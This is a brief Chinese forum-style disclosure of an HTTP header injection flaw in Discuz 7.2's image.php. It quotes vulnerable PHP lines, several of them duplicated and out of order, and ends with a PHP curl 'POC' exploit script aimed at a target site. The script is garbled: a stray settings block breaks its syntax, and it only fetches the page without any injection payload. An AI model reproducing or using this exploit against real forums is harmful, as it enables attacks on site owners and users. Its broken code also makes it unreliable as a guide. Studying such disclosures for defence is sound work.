dz7.2 HTTP 头注入漏洞

dz7.2 HTTP 头注入漏洞 20107/7/，dz7.2 header injection vulnerability 20107/7/

image.php：

header header('location: '.$boardurl.$thumbfile);
$boardurl = htmlspecialchars('http://'.$_SERVER['HTTP_HOST'].preg_replace("/\/+(api|archiver|wap)?\/*$/i", '', substr($PHP_SELF, 0, strrpos($PHP_SELF, '/'))).'/');
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$PHP_SELF = $_SERVER['PHP_SELF'] ? $_SERVER['PHP_SELF'] : $_SERVER['SCRIPT_NAME'];
$thumbfile = 'forumdata/imagecaches/'.$aid.'_'.$w.'_'.$h.'.jpg';
$aid = intval($_GET['aid']);
$w = intval($w);
list($w, $h) = explode('x', $_GET['size']);
$h = intval($h);
list($w, $h) = explode('x', $_GET['size']);

requires:
if(!$nocache) {
if(file_exists($thumbfile)) {

POC：

#!/usr/bin/php -f
<?php
#
# image.php curl exploit
# bincker/2010/7/7/ t00ls.net

general settings:
URL:
COOKIEJAR:
Max Exec Time: (s)
SSL: BasicAuth:
$_SERVER parameter:
You can taint $_SERVER['PHP_SELF'] by editing the target URL.


//
// HTTP SERVER,
//

$target = $argv[1];

$ch = curl_init();
curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);
curl_setopt($ch, CURLOPT_URL, "http://$target/image.php");
curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)");
curl_setopt($ch, CURLOPT_TIMEOUT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_LIMIT, 3);
curl_setopt($ch, CURLOPT_LOW_SPEED_TIME, 3);
curl_setopt($ch, CURLOPT_COOKIEJAR, "/tmp/cookie_$target");
$buf = curl_exec ($ch);
curl_close($ch);
unset($ch);

echo $buf;

?>

Form:t00ls